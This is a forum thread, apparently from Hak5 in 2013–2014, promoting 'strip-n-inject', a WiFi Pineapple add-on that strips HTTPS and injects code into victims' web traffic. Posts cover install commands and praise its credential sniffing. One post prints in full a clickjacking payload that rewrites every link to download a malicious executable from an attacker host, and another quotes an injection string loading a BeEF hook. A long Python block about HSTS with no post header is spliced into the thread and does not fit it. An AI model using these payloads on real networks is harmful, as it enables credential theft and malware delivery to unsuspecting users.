leg3nd Posted October 25, 2013 (edited)

Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits:
- Strip SSL from sessions before injecting code, which allows for a larger attack surface.
- An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view.

The attacks that can be implemented from this are endless.. SSLstrip for stealing passwords and injecting a BeEF hook.. or Java Applets... or Browser_AutoPwn in an Iframe.. All these and more will be possible via JasagerPwn or manually.

Feature Set:
- Installer - The installer will set up the SSLStrip dependencies. This will probably even fix your normal sslstrip infusion if you're having issues with it. Note: This does not use the default SSLStrip on the system since SSLStrip had to be modified for this purpose.
- Log Output - Displays the log standard output that is generated by the modified SSLStrip. Yes.. you can still get passwords in here in the process.
- Attacker (single address) filter - Pretty self explanatory, this adds a '! -s attacker_ip' to the iptables rule so you do not inject code into your own browsing sessions.
- Injection Code Editor - Allows you to enter any arbitrary code into the text editor. Note, if you have an attack running and modify this code - you need to restart the attack.
- Auto Refresh Enable/Disable and Logging in Small Tile

Screenshot (Interface)
Screenshot (Basic Alert Pop-up)

Credit:
Infusion GUI: Whistle Master
SSLStrip: Moxie Marlinspike

Cheers!

Edited October 25, 2013 by leg3nd
levisiccard Posted October 25, 2013

Got it installed! Grabbing a pizza out of the oven and will check it out tonight. Hope it fixes ssl strip also, would be cool. cheers!
leg3nd Posted October 25, 2013 Author

Cool, please report any bugs so I can get em fixed up. This is my advice with the SSLstrip issues:
- If SSLStrip is already working for you: don't press install because it will "just work" regardless of whether it's "not installed".
- If SSLstrip is not working: The "Install" will likely fix it based on previous forum posts of SSLstrip installations.

This is basically the install script if you feel like trying it manually:

opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web
if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
    ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fi
if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
    ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fi
levisiccard Posted October 25, 2013

SSH for the sslstrip issues?? Further, your infusion is working fine, also password sniffing for tcp-http. Can I just sniff passwords with it without sending the messages? greetz!
leg3nd Posted October 25, 2013 Author

If it doesn't "just work", which it should with the install button, then you might need to SSH to debug it. I'm sure you can theoretically do that by going into the "Injection Code" tab, removing all code, and saving it. This infusion is really not meant for sniffing passwords though - it lacks filters, log saving, less verbose output, etc. This infusion is meant for injecting code for more advanced attack vectors. If you have this infusion working, you should be able to sniff passwords with the normal "sslstrip" infusion as they use the same dependencies.
levisiccard Posted October 25, 2013

hups, your infusion is working like a charm, also the password sniffing, but I am unable to clear the sslstrip issue. anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-) I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment it's all networking and windows server at school, which is also taking a lot of time now... Got to make choices man but love your infusion ;-)
chriswhat Posted October 25, 2013 (edited)

Just wanted to say thanks. Prior to installing your infusion, SSLStrip was broken. In addition to the fun HTML injection, your infusion posts creds. Good work. Add logging and I won't have a use for the SSLStrip infusion.

Edited October 25, 2013 by chriswhat
leg3nd Posted October 25, 2013 Author

Quoting levisiccard: hups, your infusion is working like a charm, also the password sniffing, but I am unable to clear the sslstrip issue. anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-) I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment it's all networking and windows server at school, which is also taking a lot of time now... Got to make choices man but love your infusion ;-)

The great thing is that you don't need to know programming to mount these attacks. That's what this script is for: https://forums.hak5.org/index.php?showtopic=30588 It will automate many advanced attack vectors that utilize code injection for you - generally with the purpose of returning a meterpreter shell.

Quoting chriswhat: Add logging and I won't have a use for the SSLStrip infusion.

I guess I could add logging/filtering to this... but that wasn't the original purpose of the infusion. If the SSLstrip module doesn't get updated then I'll just grab that logic and add it to this so it can be used for both sniffing and code injection.
levisiccard Posted October 26, 2013

hey, what is the new update from today about, with the following new injection code?

<meta http-equiv="cache-control"content="no-cache"><meta http-equiv="X-UA-Compatible"content="IE=9"><script src="http://code.jquery.com/jquery-1.9.1.min.js" ></script><script>$(document).ready(function(){var div=document.createElement("div");div.id="overlayclick";div.style.zIndex="100";div.style.width="100%";div.style.height="100%";div.style.position="fixed";div.onclick=function(){window.open("http://172.16.42.160/run.php")};if(document.body.firstChild)document.body.insertBefore(div,document.body.firstChild);else document.body.appendChild(div)});</script><script>$(document).ready(function(){$("a").attr("href","http://172.16.42.160/run.php")});</script>

regards!
leg3nd Posted October 26, 2013 Author

Whoops - that's the code from the ClickJacking attack that's implemented in JasagerPwn. It basically will replace all links on the page with a download to a malicious executable as a user browses. The main purpose I made this infusion for was the attack vectors I have in JasagerPwn. The update mainly added some failsafe code to ensure the iptables commands are removed correctly and added additional verbosity to the log output. Feel free to replace it with: <script>window.alert("Pineapple!")</script> for the simple popup window.
xtr4nge Posted October 27, 2013

Hi leg3nd, good job. Take a look at this repo: https://github.com/xtr4nge/sslstrip

Response tamperer support (@kkotowicz) and Code Injection (@xtr4nge) were implemented in the same SSLStrip fork.

Options:
-t <config>, --tamper <config>    Enable response tampering with settings from <config>.
-i , --inject                     Inject code into HTML pages using a text file (default inject.txt)

For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name. Also you can implement more advanced attacks using the -t option. I'm adding these functionalities to my project this week.

regards,
leg3nd Posted October 27, 2013 Author (edited)

Quoting xtr4nge: Hi leg3nd, good job. Take a look at this repo: https://github.com/xtr4nge/sslstrip Response tamperer support (@kkotowicz) and Code Injection (@xtr4nge) were implemented in the same SSLStrip fork. Options: -t <config>, --tamper <config> Enable response tampering with settings from <config>. -i , --inject Inject code into HTML pages using a text file (default inject.txt) For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name. Also you can implement more advanced attacks using the -t option. I'm adding these functionalities to my project this week. regards,

Very cool. Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks. Thanks!

Edited October 27, 2013 by leg3nd
Foxtrot Posted October 28, 2013

Nice idea on the infusion, but don't you think that you should have a go at making your own UI? It just seems like all the infusions look the same, not just yours but most :)
leg3nd Posted October 28, 2013 Author

Naw, not anytime soon.. I can hack things together but don't care to spend my time doing web development. Standardization is a good thing imo. No point in reinventing the wheel. I guess if there became a need I might do it.. but I'm not much of a GUI fan to begin with.. I barely use it in my pentests to begin with.
Whistle Master Posted October 28, 2013

Personally, I like those infusions' UI :P @Foxtrot: Most of the infusions have the same UI as they are developed by the same person... Should I understand that you don't like my UIs ;) ?
Foxtrot Posted October 28, 2013

Not at all, I'm just starting to think you have an alter ego ;)
xtr4nge Posted November 2, 2013 (edited)

Quoting leg3nd: Very cool. Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks. Thanks!

Hi leg3nd, here you have a few screenshots of my SSLStrip fork implemented. https://github.com/xtr4nge/FruityWifi/wiki/Tutorial-(SSLStrip)

regards,

Edited November 2, 2013 by xtr4nge
secret4all Posted November 5, 2013 (edited)

I bought a Mark IV a month ago. How can I install this on the Mark IV?

Edited November 5, 2013 by secret4all
WallE Posted January 27, 2014

Does this new script bypass HSTS protection?
leg3nd Posted March 18, 2014 Author

Quoting WallE: Does this new script bypass HSTS protection?

It was not designed with that in mind. I can look into the possibility of bypassing it if that is of interest to you.
numericaldigitaldroned Posted April 26, 2014

quick newbie question.... I have the "strip-n-inject" infusion installed to my SDcard as well as the "SSL Strip" infusion installed too.... I've been trying to run them both but it has occurred to me that perhaps it should be one or the other. Thanks in advance to anyone who can clear that up for me.
i8igmac Posted April 27, 2014

I notice there's a lot to talk about with SSLStrip. Just for example, the droid application for facebook: has anyone had success on preventing ssl on droid applications?
fanbase Posted May 10, 2014

It can be both, simultaneously. In fact, this is one of the configurations that the jasagerPwn script sets up for you, with impressive effects.
leg3nd Posted May 10, 2014 Author

Quoting i8igmac: I notice there's a lot to talk about with SSLStrip. Just for example, the droid application for facebook: has anyone had success on preventing ssl on droid applications?

It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes, it would work. However, most application development teams, especially of the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake that Secure Development Life Cycles look to prevent.
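The two answers above (whether the script bypasses HSTS, and why an app that connects straight to 443 is not strippable) come down to one rule: a stripping proxy only gets a foothold if the very first request the client emits is plaintext HTTP. The following is an added example, not code from the strip-n-inject infusion, SSLstrip or any of its forks: it models the client-side HSTS cache described in RFC 6797 (max-age, includeSubDomains, policy expiry, http:// to https:// rewrite) and uses it to decide, for constructed host names, whether a client's first request would ever be visible to such a proxy.

```python
"""HSTS-style scheme upgrade: why a client that already holds an HSTS policy
(or an app that connects straight to 443) never issues the plaintext request
that an SSL-stripping proxy needs. Illustrative code, not the infusion's."""
import time
from dataclasses import dataclass
from typing import Dict, Optional
from urllib.parse import urlsplit, urlunsplit


@dataclass
class HstsEntry:
    expires_at: float        # absolute time (seconds) after which the policy lapses
    include_subdomains: bool


def parse_hsts(header: str, now: float) -> Optional[HstsEntry]:
    """Parse a Strict-Transport-Security header value (RFC 6797 section 6.1).

    Directive names are case-insensitive, max-age is mandatory, and a header
    without it (or with a non-numeric value) is ignored by returning None.
    """
    max_age = None
    include_subdomains = False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
    if max_age is None:
        return None
    return HstsEntry(expires_at=now + max_age, include_subdomains=include_subdomains)


class HstsCache:
    """Minimal per-host policy store modelled on a browser's HSTS cache."""

    def __init__(self) -> None:
        self._policies: Dict[str, HstsEntry] = {}

    def record(self, host: str, header: str, now: float) -> None:
        """Store the policy a host sent over HTTPS; max-age=0 deletes it."""
        entry = parse_hsts(header, now)
        if entry is None:
            return
        host = host.lower()
        if entry.expires_at <= now:
            self._policies.pop(host, None)
        else:
            self._policies[host] = entry

    def is_known(self, host: Optional[str], now: float) -> bool:
        """True if host (or a parent with includeSubDomains) has a live policy."""
        if not host:
            return False
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self._policies.get(".".join(labels[i:]))
            if entry is None or entry.expires_at <= now:
                continue
            if i == 0 or entry.include_subdomains:
                return True
        return False

    def rewrite(self, url: str, now: float) -> str:
        """Return the URL the client will actually request: http:// becomes
        https:// (port 80 -> 443) for hosts with a live policy, else unchanged."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not self.is_known(parts.hostname, now):
            return url
        netloc = parts.netloc[:-3] if parts.netloc.endswith(":80") else parts.netloc
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


def first_request_is_plaintext(start_url: str, cache: HstsCache, now: float) -> bool:
    """An https:// start URL or a cached HSTS policy both keep the first
    request off the wire in plaintext; only a bare http:// start exposes it."""
    return urlsplit(cache.rewrite(start_url, now)).scheme == "http"


if __name__ == "__main__":
    now = time.time()
    cache = HstsCache()
    # Constructed example hosts; the policy is what the app/browser would have
    # seen on an earlier, unstripped HTTPS visit to app.example.
    cache.record("app.example", "max-age=31536000; includeSubDomains", now)
    for url in ("http://login.app.example/", "https://api.other.example/",
                "http://legacy.other.example/"):
        print(f"{url:32} first request plaintext: "
              f"{first_request_is_plaintext(url, cache, now)}")
```

Only the last of the three constructed URLs comes out as plaintext: a client that starts on https:// (the "straight to 443" case) or that already holds a policy for the host never sends the request a stripping proxy would need to rewrite, which is also why preloaded HSTS lists matter for the very first visit.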
toan3000 Posted May 18, 2014

Quoting leg3nd: It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes, it would work. However, most application development teams, especially of the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake that Secure Development Life Cycles look to prevent.

Hi @leg3nd, I tried your infusion many times but never succeeded in injecting hook.js into traffic through my Pineapple. I configured my Pineapple to work in "client mode"; my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running the beef server. I ssh to the pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/". Everything seems ok, but when I test surfing the web through the pineapple, the html page is not injected; I check the source code of the html response and it does not have hook.js. I don't know what's wrong? Can you help me? Thanks a lot!